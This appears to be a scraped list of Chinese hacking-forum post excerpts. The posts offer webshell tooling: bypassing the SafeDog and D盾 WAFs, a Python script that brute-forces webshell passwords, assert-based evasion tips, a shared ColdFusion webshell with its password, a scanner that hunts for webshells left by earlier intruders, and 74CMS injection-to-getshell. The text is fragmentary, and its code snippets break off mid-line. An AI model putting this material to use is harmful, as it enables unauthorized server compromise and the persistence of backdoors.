改包上传 绕过安全狗

03.png

快速一句话爆破Python脚本

# set url,shell_type,dic filename
url = "http://172.16.18.2:8666/luan.asp"
shell_type = "asp"
dic_filename = "WebshellPassword.tx

assert免杀一句话

0x00 eval和assert的区别

http://www.vuln.cn/8395
http://www.php.net/manual/zh/function.eval.php
http://php.net/manual/zh/functions.variable-functions.php

1)assert是函数,eval不是函数,是语言构造器
2)eval($a)中$a只能是字符串,assert($a)中$a可以是php代码,也可以是php代码的字符串,assert($a)的$a如果是字符串形式不能有2个以上的
分号,如果有2个以上的分号只执行到第一个,使用assert来执行多条php语句可借助eval来实现.

分享一cfm大马

cfm马一直比较少,除了菜刀里面那个,好用的不多。今天偶遇这cfm大马,个人觉得还行,就分享出来。东西也不是自己写的就不收TuBi了。表哥们有什么好用的cfm马求在楼下分享。这个大马的密码是:al3frite

乌云社区zone 200+篇文章打包下载

QQ截图20161102104934.jpg

基于字典的webshell的自动化检测爆破

闲着无聊写了一个,识别率可能不太高,根据常见webshell名称作为字典,探测网站是否有前人留下的webshell,自动化识别,并爆破

webshell的自动化检测爆破

御剑修改版 2016.9.27 更新

御剑修改版 2016.9.27 更新

之前修改的版本 有点小问题,现在修复了。

为了与别人的修改版本 不一样 特意修改了程序的图标。

如果查询不了 请使用wind7系统 

过D盾,安全狗,一句话

其他waf什么的自己测试

//过D盾过安全狗
 
<?php
error_reporting(0);
$b

绕过安全狗写shell和隐藏后门大马

74CMS多处注入漏洞以及后台getshell

<p style="box-sizing: border-box; margin-top: 0px; margin-bottom: 10px; color: rgb(51, 51, 51); font-family: 'Microsoft Yahei', '冬青黑体简体中文 w3', 宋体; letter-spacing: 0.5px; line-height: 24px; white-space: normal; background-color: rgb(25